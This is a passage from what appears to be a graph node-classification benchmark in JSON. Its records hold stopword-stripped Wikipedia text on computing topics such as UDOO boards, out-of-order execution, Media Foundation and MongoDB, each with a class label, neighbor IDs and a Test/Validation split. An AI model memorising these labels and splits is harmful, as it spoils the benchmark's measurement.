      9369,
      2212,
      9391,
      3250,
      11447,
      5326,
      5844,
      9428,
      3294,
      10985,
      5356,
      9964,
      5358,
      1776,
      8944,
      8439,
      9976,
      7421,
      255,
      1791,
      2821,
      3352,
      9500,
      2334,
      2847,
      5922,
      3883,
      8506,
      7997,
      6463,
      833,
      9541,
      7508,
      9582,
      372,
      1399,
      1915,
      10620,
      7039,
      3459,
      3973,
      4491,
      8590,
      6038,
      9655,
      8120,
      8125,
      8126,
      977,
      2514,
      473,
      3547,
      477,
      5088,
      1515,
      499,
      4603,
      8700,
      3070
    ],
    "mask": "Test"
  },
  {
    "node_id": 6925,
    "label": 3,
    "text": "UDOO:udoo udoo single-board computer integrated arduino due compatible microcontroller designed computer science education world makers internet things product launched kickstarter april 2013 reaching wide consensus product line involves three single board computers – udoo quad/dual 2013 udoo neo 2015 udoo x86 2016 – differ various aspects plus udoo blu set udoo bricks udoo development platform merges dual quad core arm freescale cortex-a9 i.mx 6 cpu run linux android operating systems arduino due compatible board dedicated arm atmel sam3x8e cpu udoo joint effort aidilab srl seco usa inc collaboration multidisciplinary team researchers expertise interaction design embedded systems sensor networks cognitive science udoo project launched kickstarter april 9 2013 aidilab — siena university startup — seco embedded computing firm reached goal 27,000 40 hours goal well exceeded 4,172 backers pledged 641,614 udoo board equipped two cpus freescale i.mx 6 arm cortex a9 processor based arm v7 instruction set next generation graphics high-definition video central i.mx 6 series i.mx 6 series supports 1080p60 video playback enabling exceptional high-quality videos low power consumption devices playing high-definition content 3d graphics engine top line i.mx 6 quad i.mx 6 dual processors capable providing 200 mt/s enables ultra-vivid realistic graphics critical multimedia applications combine power main cores until-now-untapped potential 3d engine perform computational tasks otherwise atmel sam3x implements real-time computing allows full compatibility arduino due prototyping board solution udoo used like arduino due microcontroller programmed way stand-alone different clocks shared memory process tasks asynchronously without kind emulation however share communication channels i.mx 6 dual/6 quad application processors latest additions freescale semiconductor growing family multimedia-focused products offering high performance processing optimized lowest power consumption i.mx 6 dual/6 quad processors feature freescale advanced implementation arm cortex-a9 core interfaced ddr3-1066 lv-ddr3-1066 lpddr2-1066 single dual channel dram memory devices i.mx 6 dual/6 quad processor based arm cortex a9 mpcore platform following features arm cortex a9 mpcore complex includes i.mx 6 quad processor makes use dedicated hardware accelerators order meet targeted multimedia performance use hw accelerators key factor inobtaining high performance low power consumption numbers keeping cpu core relatively free perform tasks i.mx 6 quad processor incorporates following hardware accelerators miscellaneous ips interfaces atmel ’ sam3x/a series member family flash microcontrollers based high performance 32-bit arm cortex-m3 risc processor operates maximum speed 84 mhz features 512 kbytes flash 100 kbytes sram peripheral set includes high speed usb host device port embedded transceiver ethernet mac 2x cans high speed mci sdio/sd/mmc external bus interface nand flash controller 5x uarts 2x twis 4x spis well 1 pwm timer 9x general-purpose 32- bit timers rtc 12-bit adc 12-bit dac sam3x/a series ready capacitive touch thanks qtouch library offering easyway implement buttons wheels sliders sam3x/a architecture specifically designed sustain high speed data transfers includes multi-layer bus matrix well multiple sram banks pdc dma channels enable run tasks parallel maximize data throughput operates 1.62v 3.6v available 100- 144-pin qfp lfbga packages sam3x/a devices particularly well suited networking applications industrial home/building automation gateways freescale i.mx 6 atmel sam3x connected uart serial port embedded board works exactly like arduino connected external computer usb cable sam3x linux communicate two way channel exchanging messages tested baudrate 115200 serial connection also accessible external pins 0 1 arduino compatible pinout sam3x programming port accessible way arduino due via usb-to-serial converter directly external pinout serial uart connected imx 6 pins keyrow0 keycol0 sam3x side connected pins urxd utxd shared serial also available micro-usb plug cn6 removing j18 jumper communicate channel becomes shared udoo uses 4 micron mt41j256m16re-15e ram modules 2gbit module total 1gbyte clock frequency 400mhz udoo dual 528mhz udoo quad memory system consists following levels mac-net core conjunction 10/100/1000 mac implements layer 3 network acceleration functions functions designed accelerate processing various common networking protocols ip tcp udp icmp providing wire speed services client applications udoo uses ksz9031rnx ethernet transceiver completely integrated triple-speed 10base-t/100base-tx/1000base-t ethernet physical layer transceiver transmission reception data standard cat-5 unshielded twisted pair utp cable ksz9031rnx provides reduced gigabit media independent interface rgmii direct connection rgmii macs gigabit ethernet processors switches data transfer 10/100/1000 mbit/s ksz9031rnx reduces board costs simplifies board layout using on-chip termination resistors four differential pairs integrating ldo controller drive low-cost mosfet supply 1.2v core gwf-3m08 wlan module supporting ieee 802 11 b/g/n standards 6-pin connector supporting usb 2.0 /1.1 interface small form factor low cost compact wlan module designed wireless connectivity products embedded system module operates 2.4 ghz ism frequency band applies highly integrated mac/bbp rf single chip rt5370 150mbit/s phy rate supporting module built-in embedded applications ip camera ip set top box gps internet radio apparatus directly soldered main pcb features front connectors ports up-side connectors ports summary features gpu3d includes udoo provides one two i.mx 6 lvds outputs external pinout input used communicate rgb data controls external lcd displays lvds interface lvds receivers lvds port may used one single-channel output boot android otg bus switched connect sam3x therefore connection two processors plug usb cable cn3 ’ work since disconnected setup i.mx 6 communicate sam3x using android adk protocol must program sam3x sketch includes specific libraries installs app android configured use adk protocol udoo based dual quad core arm cortex-a9 cpu delivering great performance android linux os dedicated arm processor gpio specifications available accessories udoo board comes two micro sd card optional android ubuntu linux installed",
    "neighbors": [
      3585,
      11395,
      11396,
      3467,
      10767,
      1170,
      1682,
      11282,
      7445,
      666,
      9371,
      4124,
      1442,
      4773,
      9638,
      682,
      8237,
      11054,
      7983,
      2224,
      11314,
      3511,
      823,
      1849,
      8250,
      9913,
      11447,
      10945,
      6978,
      7234,
      7235,
      6981,
      9928,
      11080,
      2635,
      9163,
      6607,
      2517,
      2524,
      1377,
      2788,
      7269,
      3050,
      5356,
      9581,
      9964,
      7281,
      499,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 6926,
    "label": 3,
    "text": "Out-of-order_execution:out-of-order execution computer engineering out-of-order execution formally dynamic execution paradigm used high-performance central processing units make use instruction cycles would otherwise wasted paradigm processor executes instructions order governed availability input data execution units rather original order program processor avoid idle waiting preceding instruction complete meantime process next instructions able run immediately independently out-of-order execution restricted form data flow computation major research area computer architecture 1970s early 1980s important academic research subject led yale patt hpsm simulator paper james e. smith a. r. pleszkun published 1985 completed scheme describing precise behavior exceptions could maintained out-of-order machines arguably first machine use out-of-order execution cdc 6600 1964 uses scoreboard resolve conflicts although modern usage scoreboarding considered in-order execution out-of-order execution since machines stall first raw conflict – strictly speaking machines initiate execution in-order although may complete execution out-of-order three years later ibm system/360 model 91 1966 introduced tomasulo algorithm makes full out-of-order execution possible 1990 ibm introduced first out-of-order microprocessor power1 although out-of-order execution limited floating-point instructions also case model 91 1990s out-of-order execution became common featured ibm/motorola powerpc 601 1993 fujitsu/hal sparc64 1995 intel pentium pro 1995 mips r10000 1996 hp pa-8000 1996 amd k5 1996 dec alpha 21264 1996 notable exceptions trend include sun ultrasparc hp/intel itanium intel atom silvermont architecture ibm power6 high logical complexity out-of-order technique reason reach mainstream machines mid-1990s many low-end processors meant cost-sensitive markets still use paradigm due large silicon area required implementation low power usage another design goal harder achieve out-of-order execution oooe design vulnerability microprocessor manufacturers implementations out-of-order execution mechanism reported manufacturers june 1 2017 publicized january 2018 exploitable vulnerability led millions vulnerable systems vulnerability named spectre similar vulnerability meltdown disclosed time took advantage assumption manufacturers made loading data processor cache allowing data cached privileged security boundary resulted race condition could timed leak privileged information earlier processors processing instructions performed instruction cycle normally consisting following steps new paradigm breaks processing instructions steps key concept oooe processing allow processor avoid class stalls occur data needed perform operation unavailable outline oooe processor avoids stall occurs step 2 in-order processor instruction completely ready processed due missing data oooe processors fill slots time instructions ready re-order results end make appear instructions processed normal way instructions ordered original computer code known program order processor handled data order order data operands become available processor registers fairly complex circuitry needed convert one ordering maintain logical ordering output processor runs instructions seemingly random order benefit oooe processing grows instruction pipeline deepens speed difference main memory cache memory processor widens modern machines processor runs many times faster memory time in-order processor spends waiting data arrive could processed large number instructions one differences created new paradigm creation queues allows dispatch step decoupled issue step graduation stage decoupled execute stage early name paradigm decoupled architecture earlier in-order processors stages operated fairly lock-step pipelined fashion instructions program may run correct order long end result correct separates fetch decode stages execute stage pipelined processor using buffer buffer purpose partition memory access execute functions computer program achieve high-performance exploiting fine-grain parallelism two effectively hides memory latency processor perspective larger buffer theory increase throughput however processor branch misprediction entire buffer may need flushed wasting lot clock cycles reducing effectiveness furthermore larger buffers create heat use die space reason processor designers today favour multi-threaded design approach decoupled architectures generally thought useful general purpose computing handle control intensive code well control intensive code include things nested branches occur frequently operating system kernels decoupled architectures play important role scheduling long instruction word vliw architectures avoid false operand dependencies would decrease frequency instructions could issued order technique called register renaming used scheme physical registers defined architecture physical registers tagged multiple versions architectural register exist time queue results necessary resolve issues branch mispredictions exceptions/traps results queue allows programs restarted exception requires instructions completed program order queue allows results discarded due mispredictions older branch instructions exceptions taken older instructions ability issue instructions past branches yet resolve known speculative execution",
    "neighbors": [
      1024,
      4098,
      7173,
      9739,
      2066,
      7699,
      5655,
      1563,
      10779,
      10781,
      1057,
      6181,
      8231,
      6184,
      10796,
      3630,
      9774,
      2097,
      6705,
      7218,
      4664,
      2623,
      2113,
      7234,
      7745,
      3142,
      2638,
      10837,
      604,
      1122,
      99,
      7270,
      3175,
      6247,
      6253,
      8815,
      6256,
      1137,
      3185,
      4211,
      5235,
      630,
      8822,
      10361,
      9851,
      6268,
      3197,
      638,
      644,
      10375,
      7313,
      146,
      6804,
      7833,
      6815,
      8352,
      5793,
      4258,
      6818,
      8863,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      4276,
      9911,
      1722,
      8890,
      1725,
      2237,
      4286,
      5309,
      2241,
      2243,
      6339,
      9932,
      5329,
      10966,
      731,
      2269,
      6878,
      11487,
      2273,
      10469,
      7911,
      10985,
      9964,
      5358,
      5871,
      1776,
      8944,
      757,
      2805,
      3317,
      10485,
      249,
      3323,
      3835,
      8700,
      2814,
      1798,
      3846,
      1801,
      10508,
      781,
      6415,
      4881,
      1298,
      11539,
      4886,
      3352,
      2337,
      1826,
      2339,
      5922,
      6949,
      6950,
      5417,
      810,
      4909,
      3886,
      7983,
      10543,
      7988,
      309,
      8501,
      10548,
      5948,
      9020,
      4928,
      6978,
      8003,
      5444,
      8514,
      4423,
      11080,
      8523,
      6476,
      10571,
      1871,
      1872,
      7505,
      9044,
      11604,
      342,
      344,
      3421,
      8543,
      1376,
      3431,
      10603,
      4465,
      10612,
      373,
      11636,
      1399,
      7033,
      1402,
      10618,
      3457,
      398,
      3470,
      5518,
      8590,
      5523,
      1428,
      407,
      409,
      10658,
      8102,
      9126,
      426,
      10669,
      7598,
      1967,
      2480,
      9137,
      10675,
      1461,
      1463,
      7607,
      4030,
      1983,
      1985,
      9665,
      453,
      3014,
      7631,
      8143,
      5073,
      466,
      10706,
      980,
      3540,
      473,
      1499,
      3547,
      10205,
      1502,
      7134,
      2529,
      5090,
      995,
      7653,
      7657,
      9707,
      8684,
      1005,
      10734,
      6639,
      499,
      4596,
      3575,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 6927,
    "label": 2,
    "text": "Media_Foundation:media foundation media foundation mf com-based multimedia framework pipeline infrastructure platform digital media windows vista windows 7 windows 8 windows 8.1 windows 10 intended replacement microsoft directshow windows media sdk directx media objects dmos so-called legacy multimedia apis audio compression manager acm video windows vfw existing directshow technology intended replaced media foundation step-by-step starting features time co-existence media foundation directshow media foundation available previous windows versions including windows xp first release present windows vista focuses audio video playback quality high-definition content i.e hdtv content protection unified approach digital data access control digital rights management drm interoperability integrates dxva 2.0 offloading video processing pipeline hardware better performance videos processed colorspace encoded handed hardware composes image native colorspace prevents intermediate colorspace conversions improve performance mf includes new video renderer called enhanced video renderer evr next iteration vmr 7 9 evr better support playback timing synchronization uses multimedia class scheduler service mmcss new service prioritizes real time multimedia processing reserve resources required playback without tearing glitches second release included windows 7 introduces expanded media format support dxva hd acceleration hd content wddm 1.1 drivers used mf architecture divided control layer core layer platform layer core layer encapsulates functionality media foundation consists media foundation pipeline three components media source media sink media foundation transforms mft media source object acts source multimedia data either compressed uncompressed encapsulate various data sources like file network server even camcorder source specific functionality abstracted common interface source object use source resolver object creates media source uri file bytestream support non-standard protocols added creating source resolver source object also use sequencer object use sequence sources playlist coalesce multiple sources single logical source media sink recipient processed multimedia data media sink either renderer sink renders content output device archive sink saves content onto persistent storage system file renderer sink takes uncompressed data input whereas archive sink take either compressed uncompressed data depending output type data media sources sinks acted upon mfts mfts certain functions transform data another form mfts include multiplexers demultiplexers codecs dsp effects like reverb core layer uses services like file access networking clock synchronization time multimedia rendering part platform layer provides services necessary accessing source sink byte streams presentation clocks object model lets core layer components function asynchronously generally implemented os services pausing stopping fast forward reverse time-compression achieved controlling presentation clock however media pipeline components connected rather presented discrete components application running control layer choose source types transforms sinks needed particular video processing task hand set connections components topology complete data flow pipeline example play back compressed audio/video file pipeline consist file source object demultiplexer specific file container format split audio video streams codecs decompress audio video streams dsp processors audio video effects finally evr renderer sequence video capture application camcorder act video audio sources codec mfts work compress data feed multiplexer coalesces streams container finally file sink network sink write file stream network application also co-ordinate flow data pipeline components control layer pull request samples one pipeline component pass onto next component order achieve data flow within pipeline contrast directshow push model pipeline component pushes data next component media foundation allows content protection hosting pipeline within protected execution environment called protected media path control layer components required propagate data pipeline rate rendering synchronizes presentation clock rate time rendering embedded part multimedia stream metadata source objects extract metadata pass metadata two types coded metadata information bit rate presentation timings descriptive metadata like title author names coded metadata handed object controls pipeline session descriptive metadata exposed application use chooses media foundation provides media session object used set topologies facilitate data flow without application explicitly exists control layer exposes topology loader object application specifies required pipeline topology loader creates necessary connections components media session object manages job synchronizing presentation clock creates presentation clock object passes reference sink uses timer events clock propagate data along pipeline also changes state clock handle pause stop resume requests application theoretically one media foundation architecture media session pipeline media source transform media sink model however architecture complex set considerable scope lightweight relatively easy configure mf components designed handle processing media data simple point solutions thus practical considerations necessitated implementation variations fundamental pipeline design components source reader sink writer operate outside pipeline model developed sources split media foundation architecture three general classes pipeline architecture distinguished use distinct media session object pipeline media data flows one media sources one media sinks optionally zero media transforms media session manages flow media data pipeline pipeline multiple forks branches mf application get access media data traverses media source media sink implementing custom media transform component inserting appropriate location pipeline reader-writer architecture uses component called source reader provide media data sink writer component consume source reader contain type internal pipeline accessible application source reader media source sink writer media sink neither directly included pipeline managed media session general media data flows source reader sink writer actions application application either take packets media data called media samples source reader give directly sink writer set callback function source reader performs operation effect manages data transport application performs similar role media session pipeline architecture application since mf application manages transmission media samples source reader sink writer always access raw media data source reader sink writer components limited ability automatically load media transforms assist conversion format media data however done internally application little control source reader sink writer provide ease use pipeline architecture offers extremely sophisticated control flow media data however many components available pipeline enhanced video renderer simply readily usable reader-writer architecture application since structure media sample produced source reader identical output media source possible set pipeline architecture media samples intercepted pass pipeline copy given media sink known hybrid architecture makes possible application takes advantage sophisticated processing abilities media session pipeline utilizing ease use sink writer sink writer part pipeline interact media session effect media data processed special media sink called sample grabber sink consumes media data hands copy sink writer also possible implement hybrid architecture custom media transform copies media samples passes sink writer pass pipeline cases special component pipeline effectively acts like simple reader-writer application feeds sink writer general hybrid architectures use pipeline sink writer theoretically possible implement mechanism source reader could somehow inject media samples pipeline unlike sample grabber sink standard component exists media foundation transforms mfts represent generic model processing media data used media foundation primarily implement decoders encoders mixers digital signal processors dsps – media sources media sinks media foundation transforms evolution transform model first introduced directx media objects dmos behaviors clearly specified hybrid dmo/mft objects also created applications use mfts inside media foundation pipeline use directly stand-alone objects mfts following type microsoft recommends developers write media foundation transform instead directshow filter windows vista windows 7 windows 8 video editing video capture microsoft recommends using directshow primary focus media foundation windows vista starting windows 7 mfts also support hardware-accelerated video processing encoding decoding avstream-based media devices media foundation uses enhanced video renderer evr rendering video content acts mixer well mix 16 simultaneous streams first stream reference stream reference stream per-pixel transparency information well specified z-order reference stream transparent pixels fixed z-order position back streams final image composited onto single surface coloring pixel according color transparency corresponding pixel streams internally evr uses mixer object mixing streams also deinterlace output apply color correction required composited frame handed presenter object schedules rendering onto direct3d device shares dwm applications using device frame rate output video synchronized frame rate reference stream streams called substreams different frame rate evr discards extra frames substream higher frame rate uses frame lower frame rate windows media audio windows media video default supported formats encoding media foundation windows vista decoding mp3 file source available windows vista read mp3 streams mp3 file sink output mp3 available windows 7 format support extensible however developers add support formats writing encoder/decoder mfts and/or custom media sources/media sinks windows 7 expands upon codec support available windows vista includes avi wav aac/adts file sources read respective formats mpeg-4 file source read mp4 m4a m4v mp4v mov 3gp container formats mpeg-4 file sink output mp4 format similar windows vista transcoding encoding support exposed built-in windows application several codecs included media foundation transforms mfts addition windows media audio windows media video encoders decoders asf file sink file source introduced windows vista windows 7 includes h.264 encoder baseline profile level 3 main profile support aac low complexity aac-lc profile encoder playback various media formats windows 7 also introduces h.264 decoder baseline main high-profile support level 5.1 aac-lc he-aac v1 sbr multichannel he-aac v2 ps stereo decoders mpeg-4 part 2 simple profile advanced simple profile decoders includes decoding popular codec implementations divx xvid nero digital well mjpeg dv mft decoders avi windows media player 12 uses built-in media foundation codecs play formats default midi playback also yet supported using media foundation applications support media foundation include application uses protected media path windows also uses media foundation",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      10282,
      4143,
      9263,
      11316,
      1077,
      8246,
      1098,
      4174,
      4178,
      9813,
      603,
      2145,
      622,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      651,
      5259,
      653,
      3224,
      4771,
      7846,
      2221,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5952,
      1348,
      844,
      10079,
      11616,
      2943,
      9609,
      9612,
      9114,
      10654,
      8607,
      11683,
      6584,
      2493,
      7629,
      5078,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 6928,
    "label": 4,
    "text": "Lambros_D._Callimahos:lambros d. callimahos lambros demetrios callimahos december 16 1910 – october 28 1977 us army cryptologist flute player callimahos born alexandria greek parents family emigrated united states four father journalist main interests school chemistry physics medicine show interest music age fourteen entered high school asbury park callimahos earned degree law rutgers accord fathers wishes attended juilliard music school age nineteen graduated degree 1933 started bottom class became head class second year encouragement teacher arthur lora graduation continued study europe musical debut munich 1935 heralded meisterfloetist also played vienna autumn played all-bach programme munich consisting seven sonatas transcription flute harpsichord b-minor suite two-year tour recitals europe appointed professorship mozarteum two cds performances recorded released april 1937 first united states debut town hall continued tour europe united states joined united states army 1941 hoping interest cryptology could put service taught italian cryptanalysis fort monmouth enrolled japanese course eventually served signals intelligence officer new delhi world war ii assigned army security agency assistant william f. friedman national security agency formed men joined 1950s developed course ca-400 expansion friedman intensive-study course graduates course became members dundee society part course devised zendian problem also revised friedman work produce text military cryptanalytics 1955 established nsa technical journal served technical advisor rest career health problems forced retirement 1976",
    "neighbors": [
      6599,
      4007,
      7119,
      7887,
      9615,
      2580,
      1941
    ],
    "mask": "None"
  },
  {
    "node_id": 6929,
    "label": 4,
    "text": "MIRACL_(security_firm):miracl security firm miracl formally known certivox london-based web 2.0 security firm develops information security infrastructure service iaas encryption based software service saas solutions enterprises individuals company provides on-demand encryption key management multi-factor authentication cloud specializes elliptical curve cryptography red herring selected miracl finalist 2012 europe top 100 brian spector founded certivox data security specialists 2008 help people protect business individual privacy company opened offices shoreditch 2011 company partnered low-power customer specific standard product cssp provider quicklogic february 2012 efforts jointly develop data security solutions across platforms also february company acquired shamus software creator miracl cryptographic library 2011 certivox received 1.46 million series funding led pentech ventures octopus investments 2012 launched service called privatesky allowing users encrypt messages large files 5gb design offered government businesses individuals one-click security microsoft outlook html5 web browsers however privatesky taken offline company following ripa warrant gchq national technical assistance centre ntac wanted decryption keys customer data certivox launched m-pin strong authentication system july 2013 january 2016 company changed name miracl name acronym multiprecision integer rational arithmetic cryptographic library created dublin city university school computing 1988 company acquired purchase shamus software 2012 ceo shamus software google scholar dr. michael scott also joined miracl chief cryptographer reason given name change reflect “ pivot mission business providing individual products offering complete solutions potential transform industry ”",
    "neighbors": [
      3880,
      11244,
      4429,
      467,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 6930,
    "label": 5,
    "text": "Bias_tee:bias tee bias tee three-port network used setting dc bias point electronic components without disturbing components bias tee diplexer low-frequency port used set bias high-frequency port passes radio-frequency signals blocks biasing levels combined port connects device sees bias rf called tee 3 ports often arranged shape t. conceptually bias tee viewed ideal capacitor allows ac blocks dc bias ideal inductor blocks ac allows dc although bias tees made simple inductor capacitor wideband bias tees considerably complicated practical components parasitic elements bias tees designed transmission-line environments typically characteristic impedance z 50 ohms 75 ohms impedance capacitor x chosen much less z impedance inductor x chosen much greater z ω angular frequency radians per second f frequency hertz bias tees designed operate range signal frequencies reactances chosen minimal impact lowest frequency wide-range bias tees inductor must large lowest frequency large inductor stray capacitance creates self-resonant frequency high enough frequency stray capacitance presents low-impedance shunt path signal bias tee becomes ineffective practical wide-band bias tees must use circuit topologies avoid shunt path instead one inductor series string inductors addition additional resistors capacitors prevent resonances example picosecond pulse labs model 5580 bias tee works 10 khz 15 ghz consequently simple design would need inductance least 800 μh x j 50 ohms 10 khz inductor must still look like inductor 15 ghz however commercial 820 μh inductor self-resonant frequency 1.8 mhz – four orders magnitude low johnson gives example wideband microstrip bias tee covering 50 khz 1 ghz using four inductors 330 nh 910 nh 18 µh 470 µh series design cribbed commercial bias tee modeled parasitic element values simulated results optimized component selection show advantage additional components johnson provided simulation bias tee used inductors capacitors without q suppression johnson provides simulated actual performance details girardi duplicated improved johnson design points additional construction issues bias tee used insert dc power ac signal power remote antenna amplifiers devices usually positioned receiving end coaxial cable pass dc power external source coaxial cable running powered device bias “ ” consists feed inductor deliver dc connector device side blocking capacitor keep dc passing receiver rf signal connected directly one connector blocking capacitor series internal blocking diode prevents damage bias “ ” reverse supply voltage applied bias tees used variety applications generally used provide rf signal dc power remote device running two separate cables would advantageous biasing often used photodiodes vacuum solid state microchannel plate detectors transistors triodes high frequencies signal leak common power supply rail conversely noise power supply appear signal line examples include power ethernet active antennas low-noise amplifiers converters telephone line plain old telephone service early microphones use bias tee circuit—often gyrator replacing inductor—this enables thin cable 2 conductors send power system device send audio device back system modern microphones often use 3 conductors phantom power circuit similar bias tee circuit several bias tee designs construction horizontal bar based rigid coaxial cable air dielectric radius chosen large possible without allowing higher modes design bias based upon power going remote device seen base station receiver using capacitor rf output terminal effectively creating open circuit dc current incoming rf signal one antenna output dc power front-end bias typically consists bandpass filter low noise amplifier mixer coupled local oscillator one point small slice cut center conductor therefore capacitor formed low frequencies blocked kind capacitor advantage nearly invisible higher frequencies pass frequencies 1 mhz capacitance increased dielectric like npo multiplies capacitance factor 65 thickness capacitor minimal without leading electric breakdown dielectric means avoid peaks electric field means smooth electrodes rounded edges dielectric protruding electrodes doorknob design stack capacitors used every capacitor needs access surface inner conductor hidden behind another capacitor high frequencies wo n't see electric field needs lot time travel dielectric high dielectric constant small coil made fine wire air core mnfezn-core connects inner conductor one sides capacitor port outer conductor leading t. frequencies 1 ghz hit coil side apply equal electric field whole coil therefore higher modes excited within coil inductiveness coil almost current leaks center conductor port frequencies 1 mhz 1 ghz leak port second coil cone shaped core outside outer conductor inside housing avoid interference components cone acts like tapered transmission line transformer starts high impedance lot power reflected rest travel coil leakage low frequency port oscillations capacitor coil composed lc circuit damped dielectric core also small coil 10 ohm resistance damp oscillations avoid ripple transmitted spectrum",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 6931,
    "label": 3,
    "text": "Tashiro_Masashi_no_Princess_ga_Ippai:tashiro masashi princess ga ippai story hero masashi tashiro rescue four princesses distress one happy ending four unhappy endings used game becoming one first video games multiple endings game successful started appearing frequently getting high prices online auction sites like yahoo 2000 masashi tashiro arrested convicted several times connection voyeurism drug abuse",
    "neighbors": [
      9006,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 6932,
    "label": 7,
    "text": "MongoDB_Inc.:mongodb inc. mongodb inc. formerly 10gen american software company develops provides commercial support open source database mongodb nosql database stores data json-like documents flexible schemas company first established 2007 10gen based new york city 10gen founded former doubleclick founder cto dwight merriman former doubleclick ceo gilt groupe founder kevin p. ryan former doubleclick engineer shopwiki founder cto eliot horowitz received 81 million venture capital funding flybridge capital partners in-q-tel intel capital new enterprise associates nea red hat sequoia capital union square ventures 10gen originally aimed build platform service architecture based entirely open source components however company unable find existing database platform met principles cloud architecture result company began develop document-oriented database system called mongodb realizing potential software 10gen team decided scrap cloud platform focus maintaining mongodb instead february 2009 10gen released mongodb open source project 10gen opened first west coast office august 2010 offices palo alto reston london dublin barcelona sydney 2012 september 2012 10gen named top software company number 9 overall wall street journal next big thing 2012 april 2013 10gen moved old new york times building office located prince st. august 27 2013 10gen announced would change name mongodb inc. associating closely ultimately became flagship products august 5 2014 dev ittycheria appointed president chief executive officer mongodb inc primary technology product open source nosql database mongodb mongodb inc. employs developers mongodb july 2018 mongodb database downloaded 40 million times 2016 mongodb inc launched mongodb atlas fully managed database service offering atlas available 50 regions amazon web services microsoft azure google cloud platform contains features global clusters automated provisioning upgrades backup restore monitoring 2018 mongodb inc launched mongodb stitch serverless platform stitch provides four core services march 2010 mongodb announced would offer commercial support mongodb mongodb subscription offering includes access mongodb enterprise professional support commercial licensing mongodb 2.4 release mongodb introduced mongodb enterprise part subscription offering mongodb enterprise contains monitoring security features kerberos authentication role-based privileges mongodb 4.0 mongodb enterprise version contains following features ops manager on-premises solution managing mongodb ops manager available part mongodb enterprise advanced subscription features comprehensive support mongodb best sla cloud manager cloud based solution managing mongodb cloud manager automates provisioning aws automation agent installed user mongodb compass allows quickly visualize structure data database perform ad hoc queries – zero knowledge mongodb query language mongodb charts data visualization tool allowing users create graphs charts maps tables json data stored mongodb database mongodb connector bi allows use bi tool choice visualize discover report mongodb data using standard sql queries mongodb world annual developer conference hosted mongodb inc started 2014 mongodb world provides multi-day opportunity communities experts mongodb network learn peers research upcoming trends interesting use cases hear new releases developments mongodb inc. major participants include developers operators cios ctos september 2012 company announced partnership edx offer free mongodb training online 47,000 enrollments first mongodb online education courses 2012 june 2018 1,000,000 course registrations mongodb university addition online education mongodb university offers public training classes well on-site training mongodb inc. known 10gen received funding u.s. government cia-sponsored venture capital arm in-q-tel source concern india",
    "neighbors": [
      4194,
      7043,
      9828,
      9455
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6933,
    "label": 9,
    "text": "SuperCollider:supercollider supercollider environment programming language originally released 1996 james mccartney real-time audio synthesis algorithmic composition since evolving system used developed scientists artists working sound efficient expressive dynamic programming language providing framework acoustic research algorithmic music interactive programming live coding released terms gplv2 2002 supercollider free open-source software starting version 3 supercollider environment split two components server scsynth client sclang components communicate using osc open sound control sc language combines object-oriented structure smalltalk features functional programming languages c-family syntax sc server application supports simple c c++ plugin apis making easy write efficient sound algorithms unit generators combined graphs calculations external control server happens via osc possible use languages applications supercollider sound generation bundled optimised command-line executable named scsynth cases controlled within supercollider programming language used independently audio server following features supernova independent implementation server architecture adds multi-processor support explicit parallel grouping synthesis nodes supercollider programming language dynamically typed garbage-collected single-inheritance object-oriented functional language similar smalltalk syntax similar lisp c programming language architecture strikes balance needs realtime computation flexibility simplicity abstract language like many functional languages implements functions first-class objects may composed functions methods default argument values variable length argument lists called order keyword arguments closures lexical scope lexical dynamic features typical functional languages supported including creation closures via partial application explicit currying tail call optimization list comprehensions coroutines specifics include implicit expansion tuples stateless pattern system constant-time message lookup real-time garbage collection allows large systems efficient handle signal processing flexibly supporting methods reflective conversational literate programming supercollider makes relatively easy find new sound algorithms develop custom software well custom frameworks regards domain specific knowledge general e.g. allows represent properties time pitch variable degrees abstraction copious example implementations specific purposes supercollider language allows users construct cross-platform graphical user interfaces applications standard class library user interface components may extended number available frameworks interactive programming system supports programmatic access rich-text code files may used generate vector graphics algorithmically server controlled using open sound control osc variety applications used control server supercollider language environments see typically used osc-aware systems used pure data third-party clients supercollider server exist including rsc3 scheme client hsc3 based haskell scalacollider based scala overtone based clojure sonic pi distinct development environments mentioned provide interface supercollider programming language instead communicate directly audio server provide approaches facilitating user expression supercollider runs macos linux windows freebsd opensuse operating systems multiple language-editing environments clients used supercollider see also demonstrated supercollider run android ios supercollider code commonly edited used within cross-platform ide supports linux mac windows development environments supercollider support include versatile dynamic programming language supercollider used live coding i.e performances involve performer modifying executing code fly specific kinds proxies serve high level placeholders synthesis objects swapped modified runtime environments allow sharing modification objects process declarations networks various extension libraries support different abstraction access sound objects e.g dewdrop_lib allows live creation modification pseudo-classes -objects",
    "neighbors": [
      2304,
      7172,
      8964,
      4490,
      6797,
      8958,
      9871,
      10510,
      7571,
      9366,
      6810,
      3876,
      5031,
      5037,
      7983,
      823,
      1591,
      9783,
      9023,
      8262,
      3665,
      7128,
      7769,
      10584,
      9565,
      10083,
      6502,
      2670,
      7535,
      3705,
      9210,
      2045,
      7550
    ],
    "mask": "Test"
  },
  {
    "node_id": 6934,
    "label": 3,
